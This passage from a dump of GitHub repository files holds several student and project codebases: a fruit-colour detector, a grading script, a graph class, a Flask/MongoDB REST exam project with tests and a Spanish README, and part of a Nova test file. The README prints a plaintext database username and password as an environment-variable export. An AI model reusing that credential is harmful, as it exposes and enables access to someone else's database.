R[m,n]\r\n g = G[m,n]\r\n b = B[m,n]\r\n x = np.double([r,g ,b])\r\n SIGMA_inv = np.linalg.inv(sigma)\r\n denominator = np.sqrt((2 * np.pi)**D * np.linalg.det(sigma))\r\n exponent = -(1/2) * ((x - mu).T @ SIGMA_inv @ (x - mu ))\r\n p = float((1. / denominator) * np.exp(exponent) ) \r\n if (p > threshold):\r\n S1[m,n] = True\r\n # Calculating the pixel of the Orange fruit \r\n pixels = cv2.countNonZero(S1) \r\n image_area = im_rgb1.shape[0] * im_rgb1.shape[1]\r\n area_ratio = (pixels / image_area) * 100 \r\n # apply morphological method to fill the holes\r\n kernel = np.ones((5,5),np.uint8)\r\n dilation = cv2.dilate(S1,kernel,iterations = 1)\r\n closing1 = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel) \r\n # covert binary image to its original image without the background\r\n mask = np.atleast_3d(closing1)\r\n red = np.uint8(mask)*I\r\n return red,area_ratio,closing1,I\r\n "
},
{
"alpha_fraction": 0.5954875349998474,
"alphanum_fraction": 0.6212731599807739,
"avg_line_length": 24.77083396911621,
"blob_id": "7a3062d5ac9fc3aea6acfa6818854f9f9b05f33a",
"content_id": "2d4a791baece6debc4a83e948cf6fabbe723b0aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 48,
"path": "/Camera_test_Binary.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 16 08:37:40 2020\n\n@author: pi\n\"\"\"\n\nfrom picamera import PiCamera\nfrom picamera.array import PiRGBArray\nimport time \nimport cv2\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import metrics\nfrom sklearn.svm import SVC\n\ncamera = PiCamera()\n\nfor i in range (50):\n #camera.capture(\"/home/pi/Desktop/newfile/\" + i + \".jpg\")\n rawCapture = PiRGBArray(camera)\n time.sleep(0.5)\n #t.start()\n camera.capture(rawCapture,format = 'bgr')\n I = rawCapture.array\n show = cv2.cvtColor(I, cv2.COLOR_BGR2RGB)\n I = cv2.resize(I, (50,50))\n from detectOrangeFunc import detectOrange\n [y,x,r,z] = detectOrange(I)\n\n from detectAppleFunc import detectApple\n [y1,x1,t,z1] = detectApple(I)\n\n # Classify whether apple or Orange\n if x >x1:\n print(\"Orange\")\n plt.imshow(show,cmap = 'gray')\n plt.show()\n\n elif x1 > x:\n print(\"Apple\")\n plt.imshow(show,cmap = 'gray')\n plt.show()\n\n\n\n "
}
] | 6 |
dclancy89/python_scores_and_grades | https://github.com/dclancy89/python_scores_and_grades | 6c3cdd8e3dcbf49b685e7d960171bf4b5df84607 | bb7df7d88172c256d87dbf3d98d9267cc814bf6d | 75a6cfd889919942ea59fc5345cfe836b387706e | refs/heads/master | 2021-04-29T17:49:53.657865 | 2018-02-15T20:19:29 | 2018-02-15T20:19:29 | 121,678,172 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5642201900482178,
"alphanum_fraction": 0.5940366983413696,
"avg_line_length": 23.22222137451172,
"blob_id": "a94f1c20efe885712a547164b64769bb96470e17",
"content_id": "4d244a008576f198872436a74495452e825f203b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 18,
"path": "/scores_and_grades.py",
"repo_name": "dclancy89/python_scores_and_grades",
"src_encoding": "UTF-8",
"text": "import random\n\ndef grade():\n\tprint \"Scores and Grades\"\n\tfor x in range(11):\n\t\tgrade = random.randint(60, 100)\n\t\tif grade < 70 :\n\t\t\tprint \"Score: \" + str(grade) + \"; Your grade is D\"\n\t\telif grade < 80 :\n\t\t\tprint \"Score: \" + str(grade) + \"; Your grade is C\"\n\t\telif grade < 90 :\n\t\t\tprint \"Score: \" + str(grade) + \"; Your grade is B\"\n\t\telse:\n\t\t\tprint \"Score: \" + str(grade) + \"; Your grade is A\"\n\tprint \"End of the program. Bye!\"\n\n\ngrade()\n"
}
] | 1 |
garzuzo/sd-midterm2 | https://github.com/garzuzo/sd-midterm2 | 003cc14ce4ed17ab42140f3602e094b9c9536c7e | 8160ad35622e4658121cae41fa66ffeb4b8a6c1d | fe732eac957a755414868d9ffd689a7e33917782 | refs/heads/master | 2020-09-09T17:53:00.735274 | 2019-11-16T06:20:29 | 2019-11-16T06:20:29 | 221,517,559 | 0 | 0 | MIT | 2019-11-13T17:42:15 | 2019-11-15T21:10:56 | 2019-11-16T05:43:42 | Python | [
{
"alpha_fraction": 0.7091404795646667,
"alphanum_fraction": 0.7206199169158936,
"avg_line_length": 46.57143020629883,
"blob_id": "afe8eb578d8f1d2192057e0a8ebacc541a45fa11",
"content_id": "f6cab6fe13b9b63fec549804bc93ff10e9e0f99d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14054,
"license_type": "permissive",
"max_line_length": 824,
"num_lines": 287,
"path": "/README.md",
"repo_name": "garzuzo/sd-midterm2",
"src_encoding": "UTF-8",
"text": "# Exam 2 \r\n\r\n**Universidad ICESI** \r\n**Course:** Distributed systems \r\n**Teacher:** Juan M Álvarez Q. \r\n**Topic:** Microservices Architecture design \r\n**email:** juan.alvarez8 at correo.icesi.edu.co\r\n\r\n### Learning goals\r\n* Design a microservices architecture application\r\n\r\n### Suggested technologies for the midterm development\r\n* [Open API](https://openapi.tools/)\r\n* github repository\r\n* Flask and [connexion](https://connexion.readthedocs.io/en/latest/)\r\n* Mongo db and [mlab](https://mlab.com/)\r\n* [travis-ci](https://travis-ci.org/)\r\n\r\n### Description\r\n\r\nFor this exam you should redesing the application developed in midterm 1 into a REST-based microservices arquitecture. your aplication must comply the following:\r\n\r\n* Must have a github repository which is a fork of the **[sd-mdterm2](https://github.com/ICESI-Training/sd-midterm2)** repository\r\n* It is suggested to use mlab for data storage: mlab is a database as a service provider for mongo databases.\r\n* The system must accept Http requests from cURL (you can use other REST clients like postman, insomnia or postwoman.\r\n* The application must have an endpoint to insert data in the database.\r\n* The application must have an endpoint to retrieve all the registers from a database collection or table.\r\n* The design must have continous integration unit tests for all microservices.\r\n\r\n\r\n### Actividades (EN español para evitar ambigüedades)\r\n1. Documento README.md en formato markdown: \r\n * Formato markdown (5%).\r\n * Nombre y código del estudiante (5%).\r\n * Ortografía y redacción (5%).\r\n2. Documentación de la API de conformidad con el estándar [OpenAPI](https://github.com/OAI/OpenAPI-Specification). (15%)\r\n3. Pruebas unitarias de cada microservicio para el proceso de integración contínua (10%). Evidencia del código pasando dichas pruebas(5%).\r\n4. Archivos fuentes en el repositorio de los microservicios implementados (15%).\r\n5. Documentación de las tareas para desplegar los microservicios en una máquina local (10%). Evidencias del despliegue (peticiones cURL o similares)(10%).\r\n6. El informe debe publicarse en un repositorio de github el cual debe ser un fork de https://github.com/ICESI-Training/sd-midterm2 y para la entrega deberá hacer un Pull Request (PR) al upstream (10%). Tenga en cuenta que el repositorio debe contener todos los archivos necesarios para el despliegue.\r\n7. 
Documente algunos de los problemas encontrados y las acciones efectuadas para su solución (10%).\r\n\r\n\r\n**Integrantes:** Johan Camilo Diaz A00329772 \r\n**Integrantes:** Johnatan Garzón A00333960\r\n\r\n\r\n### Evidencia de la API de conformidad con el estándar OpenAPI\r\n\r\n\r\n##### GET\r\n\r\n\r\n>El método post en OpenAPI posee el campo de ingreso de parametros (los parametros id y name) además del significado de las posibles status code que se pueden obtener al realizar una petición, entre estos códigos se encuentran el 201 que representa una creación exitosa de un usuario en la base de datos, el código 400 que representa una bad request es decir que los parámetros enviados en la petición no son pertinentes para la operación a realizar, y el código 402 que se presenta cuando el id del usuario que se desea agregar a la base de datos ya existe.\r\n\r\n```yaml\r\n get:\r\n summary: Extraer la información\r\n description: Se extrae información todos los usuarios de la base de datos.\r\n operationId: app.read_user\r\n responses:\r\n 200:\r\n description: Datos obtenidos con éxito\r\n content:\r\n text/plain:\r\n schema:\r\n type: string\r\n example: '[{\"_id\": {\"$oid\": \"5dcb7fc020f273c7abeb0a7b\"}, \"id\": \"1\", \"name\": \"Johnatan\"}]'\r\n\r\n\r\n```\r\nEn el código YAML para la definición del método GET se cuenta con la descripción correspondiente donde se deja en claro qué función cumple este método, además se define el operationId que es un componente muy importante en la descripción del método ya que en este campo se especifica la dirección de la operación que se va a invocar cada vez que se realice una petición bajo la modalidad GET al path escrito (/users). En este caso la operación invocada se encuentra en la *app.py* y se llama *read_user*.\r\n\r\n\r\n\r\n\r\n##### POST\r\n\r\n\r\n>El método get por su parte posee solamente el significado de su status code 200 que se presenta cuando los datos se han obtenido de manera correcta, en adición a eso, también posee un ejemplo de cómo se vería el mensaje de respuesta de la petición.\r\n\r\n\r\n```yaml\r\n post:\r\n summary: Crear un usuario\r\n description: Crea un usuario en base a los datos de id y nombre ingresados por parametro.\r\n operationId: app.create_user\r\n requestBody:\r\n description: Usuario a crear en la base de datos\r\n required: true\r\n content:\r\n application/x-www-form-urlencoded:\r\n schema:\r\n $ref: '#/components/schemas/NewUser'\r\n responses:\r\n 201:\r\n description: Usuario creado con exito\r\n 400:\r\n description: Bad request\r\n 402:\r\n description: El usuario ya existe\r\n\r\n\r\ncomponents:\r\n schemas:\r\n NewUser:\r\n type: object\r\n properties:\r\n id: \r\n type: string\r\n name: \r\n type: string\r\n```\r\nPara las peticiones de tipo POST se define que cada vez que se reciba una solicitud se invoque la operación create_user que pertenece al módulo *app.py* que se encuentra en la carpeta *backend*. En este método se especifica un requestBody donde se plantea que el parámetro que será transmitido es de tipo **x-www-form-urlencoded** y que seguirá un esquema llamado *NewUser* definido en el apartado de *components*, el cual especifíca los parametros, el tipo y el nombre de los mismos, que se encuentran en el requestBody.\r\n\r\n\r\n\r\n##### DELETE\r\n\r\n\r\n>El método delete presenta dos status code, el código 204 simboliza que un usuario ha sido eliminado de la base de datos de forma correcta y el código 404 simboliza que el id del usuario que se pretendía borrar no existe. 
En adición a esto se puede apreciar que el método delete posee una ruta especial definida como /user/{id del usuario que se desea borrar} y que el id es reconocido como parámetro para la posterior eliminación del usuario que posea ese identificador.\r\n\r\n```yaml\r\n /users/{id}:\r\n delete:\r\n summary: Eliminar usuario\r\n description: Se elimina el usuario de la base de datos.\r\n operationId: app.delete_user\r\n parameters:\r\n - name: id\r\n in: path\r\n description: Identificador del usuario a eliminar\r\n required: true\r\n schema:\r\n type: string\r\n responses:\r\n 204:\r\n description: Usuario removido con éxito\r\n 404:\r\n description: El usuario no existe\r\n```\r\nEn este método se hace uso de un path diferente que cuenta con el id del usuario a eliminar, es decir, el path tiene la siguiente estructura “/users/id” donde id corresponde al usuario del que se desea prescindir. Dentro del código YAML se especifica de qué tipo debe ser este dato, para nuestro caso se decidió que el dato debe ser tipo String.\r\n\r\n### Evidencia de pruebas unitarias de cada microservicio para el proceso de integración continua\r\n\r\nPrueba para obtener todos los usuarios\r\n\r\n```python\r\ndef test_valid_read_clients(client):\r\n response = client.get('/users')\r\n assert response.status_code == 200\r\n```\r\n\r\nPrueba de un endpoint inválido, en este caso obtener un usuario en específico no está implementado por lo que debería retornar un status code igual a 405:\r\n```python\r\ndef test_invalid_endpoint_read_clients(client):\r\n response = client.get('/users/32')\r\n assert response.status_code == 405\r\n```\r\n\r\nPrueba válida de creación de un nuevo usuario. Se crea un nuevo usuario, el cúal al crear retorna un status code igual a 201, y luego es eliminado para no interferir con futuras pruebas y retorna un status code igual a 204:\r\n```python\r\ndef test_valid_create_clients(client):\r\n \r\n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\r\n \"Accept\": \"application/json\"} \r\n response = client.post('/users', data=dict(id='abc12345', name='Marshmillow'), headers=header)\r\n \r\n assert response.status_code == 201\r\n response_remove=client.delete('/users/abc12345')\r\n assert response_remove.status_code == 204\r\n```\r\n\r\n\r\nPrueba para verificar que la eliminación de usuarios que no existen retornen un 404:\r\n```python\r\ndef test_delete_clients_unavailable(client):\r\n response_remove=client.delete('/users/juanmaid')\r\n assert response_remove.status_code == 404\r\n```\r\n\r\n\r\nPrueba para verificar que no se cree un usuario que existía previamente, es decir, que retorne un status code igual a 402:\r\n```python\r\ndef test_invalid_create_clients(client):\r\n \r\n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\r\n \"Accept\": \"application/json\"}\r\n\r\n response = client.post('/users', data=dict(id='1', name='Marshmillo'), headers=header)\r\n \r\n assert response.status_code == 402\r\n \r\n```\r\n\r\n\r\nPrueba para verificar que retorne un status code igual a 400 cuando se envíe un body incorrecto en la creación de un nuevo usuario:\r\n```python\r\ndef test_invalid_body_req_create_clients(client):\r\n \r\n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\r\n \"Accept\": \"application/json\"}\r\n\r\n response = client.post('/users', data=dict(id='bcc21912', names='Marshmillo'), headers=header)\r\n \r\n assert response.status_code == 400\r\n```\r\n\r\n\r\n\r\n\r\n\r\n\r\n### Evidencia del código pasando dichas 
pruebas\r\nPara correr las pruebas de manera **local** se usa el comando:\r\n```sh\r\n$ pytest tests/test_app.py\r\n```\r\nPodemos observar el resultado exitoso de las seis pruebas implementadas:\r\n\r\n\r\n\r\nAhora, observamos el resultado de la ejecución de las pruebas en **travis CI**:\r\n\r\n\r\n\r\n\r\nObservamos como se carga primero la variable de entorno **MONGO_FLASK**, y luego se encarga de instalar los requerimientos indicados en **requirements.txt**, y por último ejecuta las pruebas, dando como resultado seis pruebas exitosas:\r\n\r\n\r\n\r\n\r\n\r\n\r\n### Tareas para desplegar los microservicios en una máquina local\r\n\r\nLas tareas que se deben llevar a cabo son:\r\n\r\n1. Se deben instalar los requerimientos necesarios que se encuentran en *requirements.txt*\r\n2. Se exporta la variable de entorno *MONGO_FLASK* que contiene las credenciales para conectarse con la base de datos remota\r\n3. Ejecutar la aplicación *app.py* que se encuentra en la carpeta *backend*\r\n```sh\r\n$ pip install -r requirements.txt\r\n$ export MONGO_FLASK=d_user:distribuidos20192\r\n$ python3 backend/app.py\r\n```\r\n\r\n\r\n### Evidencias del despliegue\r\n\r\nAhora, se puede observar las respuestas correctas por parte de cada uno de los endpoints implementados.\r\n\r\nObtener todos los usuarios:\r\n\r\n\r\n\r\nAgregamos un nuevo usuario:\r\n\r\n\r\n\r\n\r\nObtenemos de nuevo la lista con todos los usuarios para ver el nuevo usuario agregado:\r\n\r\n\r\n\r\nEliminamos un usuario\r\n\r\n\r\n\r\n### Problemas encontrados y acciones efectuadas para su solución\r\n\r\n\r\n- Se presentaron inconvenientes en el entendimiento de la integración de openapi con nuestra aplicación en Flask. Con el tiempo fuimos comprendiendo que lo indicado en el archivo .yaml de openapi y sus endpoints estaban ligados a cada método correspondiente, que depende del tipo de petición y la ruta.\r\n \r\n- Tuvimos problemas al importar la app.py que está en la carpeta backend en el archivo de pruebas (test_app.py), ya que al principio estabamos usando tres puntos (...) para llegar a la carpeta padre que contenía dicha carpeta. Esto resultó en errores, que primeramente solucionamos importando la libreria imp, que nos permitía importar un módulo dada una ruta, sin embargo, esta librería estaba deprecada. Por lo tanto, para solucionar esto buscamos otra librería equivalente llamada importlib, la cual, mediante el modulo machinery permite realizar la tarea requerida que se mencionó anteriormente.\r\n \r\n- Otro problema tenía que ver con la variable de entorno utilizada para guardar las credenciales de ingreso a la base de datos remota, esto debido a que no hallabamos una forma clara de cargar esta variable en travis CI, primero intentamos cargar la variable directamente en la plataforma de travis CI, pero al momento de hacer el pull request obteniamos un error, ya que la variable solo se encontraba en nuestro repositorio, por lo que pensamos en pasar la variable encriptada en el archivo .travis.yml, lo que permitiría ser usada en cualquier otro repositorio. 
Sin embargo, siguió fallando, y llegamos a la conclusión junto al profesor de que la configuración del travis en el repositorio original (al que se le debía hacer el pull request), no contaba con los permisos necesarios para hacer uso de variables de entorno.\r\n\r\n\r\n\r\n>En una vista más detallada, se puede observar el error de pymongo al no poder obtener las credenciales de autenticación para la conexión con mlab:\r\n\r\n\r\n\r\n\r\n\r\n- Por último, un problema por el que no se realizaban las peticiones HTTP en el ui de openapi, era porque estábamos accediendo desde otro origen al servidor, por lo tanto teníamos que permitir el acceso desde otros orígenes, es decir: activamos el Cross-Origin Resource Sharing (CORS), esto mediante un decorator de la librería flask_cors (@cross_origin(origin='*'))"
},
{
"alpha_fraction": 0.8552631735801697,
"alphanum_fraction": 0.8552631735801697,
"avg_line_length": 8.625,
"blob_id": "677b2b214416491fb10e2ccc7517e22a53bdea40",
"content_id": "aa3935d226e34327d37f0d5442cccca15f3fc0c0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 76,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "garzuzo/sd-midterm2",
"src_encoding": "UTF-8",
"text": "bson\nflask_pymongo\ndnspython\nflask\nconnexion\npytest\nflask_cors\nswagger-ui-py"
},
{
"alpha_fraction": 0.643056333065033,
"alphanum_fraction": 0.6581149101257324,
"avg_line_length": 24.542856216430664,
"blob_id": "f053a2aab2da989114312f701462fb14159454a5",
"content_id": "01a8be9bcf50ac351d3dcbc18a37abfd722007df",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1793,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 70,
"path": "/backend/app.py",
"repo_name": "garzuzo/sd-midterm2",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, flash, render_template, jsonify,json\nimport connexion\nfrom flask_pymongo import pymongo\nfrom bson.json_util import dumps\nimport os\nfrom flask_cors import CORS, cross_origin\napp = connexion.FlaskApp(__name__, specification_dir='../openapi/')\nurl_mongo=\"mongodb+srv://\"+str(os.environ.get('MONGO_FLASK'))+\"@distribuidos-7a22s.mongodb.net/test?retryWrites=true&w=majority\"\nclient = pymongo.MongoClient(url_mongo)\ndb = client.ds_db\n\n\n\n#app.run(port=8080)\n\napi_url = '/api'\n\[email protected](api_url+'/users', methods=['GET'])\n@cross_origin(origin='*')\ndef read_user():\n users=db.Users.find({})\n #print(dumps(list(users)))\n res=dumps(list(users))\n return res\n\n\[email protected](api_url+'/users/<string:id>', methods=['DELETE'])\n@cross_origin(origin='*')\ndef delete_user(id):\n answ=db.Users.delete_one({'id':id}).deleted_count\n if answ==0 :\n resp = jsonify('User does not exist')\n resp.status_code = 404\n return resp\n else :\n resp = jsonify('User removed successfully!')\n resp.status_code = 204\n return resp\n\n\n\n\[email protected](api_url+'/users', methods=['POST'])\n@cross_origin(origin='*')\ndef create_user():\n\n\n id=request.form['id']\n name=request.form['name']\n \n if id and name and request.method == \"POST\" :\n users=db.Users.find_one({'id':id})\n if users is not None:\n resp = jsonify('User already exists')\n resp.status_code = 402\n return resp\n else:\n db.Users.insert_one({'id': id, 'name':name})\n resp = jsonify('User added successfully!')\n resp.status_code = 201\n return resp\n else :\n resp = jsonify('Bad Request')\n resp.status_code = 400\n return resp\n\nif __name__ == \"__main__\":\n app.add_api('my_api.yaml', resolver=connexion.RestyResolver('api'))\n\n app.run(port=3000, debug=True)\n \n"
},
{
"alpha_fraction": 0.6354312300682068,
"alphanum_fraction": 0.6536130309104919,
"avg_line_length": 27.105262756347656,
"blob_id": "6c09286464f9415806b2391a0d745d25cccceed1",
"content_id": "9afb2186ab6d1e3dccb4b5b45be54ee58ddb77a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2145,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 76,
"path": "/tests/test_app.py",
"repo_name": "garzuzo/sd-midterm2",
"src_encoding": "UTF-8",
"text": "import pytest\nimport connexion\nimport os\nfrom flask import Flask, request, flash, render_template, jsonify,json\nfrom flask_pymongo import pymongo\nfrom bson.json_util import dumps\nimport importlib.machinery\n\nloader = importlib.machinery.SourceFileLoader('app','backend/app.py')\napp = loader.load_module()\n\n\nflask_app = connexion.FlaskApp(__name__, specification_dir='../openapi/')\nflask_app.add_api('my_api.yaml', resolver=connexion.RestyResolver('api'))\n\n#app = connexion.FlaskApp(__name__, specification_dir='openapi/')\n\[email protected](scope='module')\ndef client():\n with flask_app.app.test_client() as c:\n yield c\n\n\n\n\n\ndef test_valid_read_clients(client):\n \n response = client.get('/users')\n assert response.status_code == 200\n \n\n\n\ndef test_invalid_endpoint_read_clients(client):\n \n response = client.get('/users/32')\n assert response.status_code == 405\n \n\n\n\ndef test_valid_create_clients(client):\n \n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"} \n response = client.post('/users', data=dict(id='abc12345', name='Marshmillow'), headers=header)\n \n assert response.status_code == 201\n response_remove=client.delete('/users/abc12345')\n assert response_remove.status_code == 204\n\n\n\ndef test_delete_clients_unavailable(client):\n response_remove=client.delete('/users/juanmaid')\n assert response_remove.status_code == 404\n\n\ndef test_invalid_create_clients(client):\n \n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"}\n\n response = client.post('/users', data=dict(id='1', name='Marshmillo'), headers=header)\n \n assert response.status_code == 402\n \ndef test_invalid_body_req_create_clients(client):\n \n header = {\"Content-type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"}\n\n response = client.post('/users', data=dict(id='bcc21912', names='Marshmillo'), headers=header)\n \n assert response.status_code == 400\n \n "
}
] | 4 |
bizzk3t/Graph | https://github.com/bizzk3t/Graph | 0c307d5cef1d4a2044d1cb8a03d3fb7d8a21b04b | 0d3a6a7dc6db8bd96a561b33adfd9cb45a2e5a21 | 5d091b23af0bc057524e6e4bafa6192be4713ce1 | refs/heads/master | 2020-04-06T06:54:38.785908 | 2014-05-06T08:12:59 | 2014-05-06T08:12:59 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5773584842681885,
"alphanum_fraction": 0.5828092098236084,
"avg_line_length": 15.534722328186035,
"blob_id": "15d1eecf11413833863e95428774681b187f62d2",
"content_id": "d742cb596f5b10def7fe866287d2266c73512dd9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2385,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 144,
"path": "/DGraph.py",
"repo_name": "bizzk3t/Graph",
"src_encoding": "UTF-8",
"text": "\nfrom collections import deque\n\n\nclass DGraph:\n\tdef __init__(self, d):\n\t\tself.adjlist = d\n\t\tself.genEdgeSet()\n\n\tdef genEdgeSet(self):\n\t\tself.edges = set()\n\t\tfor u in self.adjlist:\n\t\t\tfor v in self.adjlist[u]:\n\t\t\t\tself.edges.add((u,v)) \n\t\n\tdef addNode(self,label):\n\t\tself.adjlist[label] = {}\n\n\tdef addEdge(self, u, v, wt):\n\t\tif (u in self.adjlist and v in self.adjlist):\n\t\t\tself.adjlist[u][v] = wt\n\t\t\tself.edges.add((u,v))\n\n\tdef removeEdge(self, u, v):\n\t\tself.adjlist[u].pop(v, None)\n\t\tif ((u,v) in self.edges):\t\n\t\t\tself.edges.remove((u,v))\n\n\tdef getEdgeWt(self, u, v):\n\t\treturn self.adjlist[u][v]\n\n\tdef getNeighbors(self, u):\n\t\treturn self.adjlist[u].keys()\n\n\tdef getEdgeSet(self):\n\t\treturn self.edges\n\n\tdef getNodeSet(self):\n\t\treturn self.adjlist.keys()\n\t\n\tdef __repr__(self):\n\t\treturn str(self.adjlist)\n\n\n\tdef drawDOT(self):\n\t\tthenodes = self.getNodeSet()\n\t\ti = 0\n\t\tnodes = {}\n\t\tfor u in thenodes:\n\t\t\tnodes[str(u)]='a_'+str(i)\n\t\t\ti = i+1\n\t\t\n\n\t\tprint \"digraph mygraph {\"\n\t\tfor n in nodes.keys():\n\t\t\tprint nodes[n] + ' [label=\"' + n + '\"]'\n\n\n\t\tfor e in self.getEdgeSet(): \n\t\t\t(u,v) = e \n\t\t\tprint nodes[str(u)] + ' -> ' + nodes[str(v)] + ' [label=\"' + str(self.getEdgeWt(u,v)) + '\"]'\n\t\tprint '}'\n\n\n\n\n\n\tdef __getitem__(self, key):\n\t\treturn self.adjlist[key]\n\n\tdef reachable_from(self, u):\n\t\t# return set of nodes reachable from u. \n\t\tpass\n\n\t# BOOM\n\tdef dfs(self, visited):\n\t\tself.clock = 0\n\t\tfor v in self.getNodeSet():\n\t\t\tvisited[v] = False\n\t\n\t\tfor v in self.getNodeSet():\n\t\t\tif (not visited[v]):\n\t\t\t\tself.explore(v, visited)\n\t\t\t\n\n\tdef explore(self, u, visited):\n\t\tvisited[u] = {} \n\t\tself.previsit(u, visited)\n\t\tfor v in self.getNeighbors(u):\n\t\t\tif (not visited[v]):\n\t\t\t\tself.explore(v, visited)\n\t\tself.postvisit(u, visited)\n\n\tdef previsit(self, u, visited):\n\t\tvisited[u]['pre'] = self.clock\n\t\tself.clock += 1\n\n\n\n\tdef postvisit(self, u, visited):\n\t\tvisited[u]['post'] = self.clock\n\t\tself.clock += 1\n\n\t# BOOM!\n\tdef bfs(self, s, dist):\n\t\tdist[s] = 0\n\t\tQ = deque([s])\n\t\twhile (len(Q) > 0):\n\t\t\tu = Q.popleft()\n\t\t\tfor v in self.getNeighbors(u):\n\t\t\t\tif (v not in dist):\n\t\t\t\t\tQ.append(v)\n\t\t\t\t\tdist[v] = dist[u]+1\n\n\t\t\n\n\n\n\ndef trygraph():\n\tG = DGraph({})\n\t\n\tG.addNode('a')\n\t\n\tG.addNode('b')\n\t\n\tG.addNode('c')\n\t\n\tG.addNode('d')\n\t\n\tG.addNode('e')\n\t\n\t\n\t\n\tG.addEdge('a', 'b', 1)\n\t\n\tG.addEdge('a', 'd', 1)\n\t\n\tG.addEdge('b', 'c', 1)\n\t\n\tG.addEdge('e', 'b', 1)\n\t\n\tG.addEdge('e', 'd', 1)\n\t\n\treturn G\n\n\n\n"
}
] | 1 |
stryng/nova | https://github.com/stryng/nova | 103b8e7cd620c1421a0ff1168f139ed0c77337b7 | 5dba32a23e67341bfdc03a00781ab491238e21f4 | fac13c773fbaeb2a3aae784e2c5096f13d0189ca | refs/heads/master | 2021-01-15T18:09:25.444410 | 2013-05-11T00:19:11 | 2013-05-11T00:19:11 | 10,013,535 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.630652904510498,
"alphanum_fraction": 0.6328136920928955,
"avg_line_length": 37.56547546386719,
"blob_id": "f1dfcdf8ec449fe91a14ce074b67c1d2ea78a9a2",
"content_id": "18a444f410d715b3e6ff84685ea6628905432b60",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6479,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 168,
"path": "/nova/tests/virt/xenapi/test_vmops.py",
"repo_name": "stryng/nova",
"src_encoding": "UTF-8",
"text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2013 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom nova.compute import task_states\nfrom nova.compute import vm_mode\nfrom nova import test\nfrom nova.virt import fake\nfrom nova.virt.xenapi import vm_utils\nfrom nova.virt.xenapi import vmops\n\n\nclass VMOpsTestCase(test.TestCase):\n def setUp(self):\n super(VMOpsTestCase, self).setUp()\n self._setup_mock_vmops()\n\n def _setup_mock_vmops(self, product_brand=None, product_version=None):\n self._session = self._get_mock_session(product_brand, product_version)\n self._vmops = vmops.VMOps(self._session, fake.FakeVirtAPI())\n\n def _get_mock_session(self, product_brand, product_version):\n class Mock(object):\n pass\n\n mock_session = Mock()\n mock_session.product_brand = product_brand\n mock_session.product_version = product_version\n return mock_session\n\n def test_check_resize_func_name_defaults_to_VDI_resize(self):\n self.assertEquals(\n 'VDI.resize',\n self._vmops.check_resize_func_name())\n\n def _test_finish_revert_migration_after_crash(self, backup_made, new_made):\n instance = {'name': 'foo',\n 'task_state': task_states.RESIZE_MIGRATING}\n\n self.mox.StubOutWithMock(vm_utils, 'lookup')\n self.mox.StubOutWithMock(self._vmops, '_destroy')\n self.mox.StubOutWithMock(vm_utils, 'set_vm_name_label')\n self.mox.StubOutWithMock(self._vmops, '_attach_mapped_block_devices')\n self.mox.StubOutWithMock(self._vmops, '_start')\n\n vm_utils.lookup(self._session, 'foo-orig').AndReturn(\n backup_made and 'foo' or None)\n vm_utils.lookup(self._session, 'foo').AndReturn(\n (not backup_made or new_made) and 'foo' or None)\n if backup_made:\n if new_made:\n self._vmops._destroy(instance, 'foo')\n vm_utils.set_vm_name_label(self._session, 'foo', 'foo')\n self._vmops._attach_mapped_block_devices(instance, [])\n self._vmops._start(instance, 'foo')\n\n self.mox.ReplayAll()\n\n self._vmops.finish_revert_migration(instance, [])\n\n def test_finish_revert_migration_after_crash(self):\n self._test_finish_revert_migration_after_crash(True, True)\n\n def test_finish_revert_migration_after_crash_before_new(self):\n self._test_finish_revert_migration_after_crash(True, False)\n\n def test_finish_revert_migration_after_crash_before_backup(self):\n self._test_finish_revert_migration_after_crash(False, False)\n\n def test_determine_vm_mode_returns_xen(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n\n fake_instance = \"instance\"\n 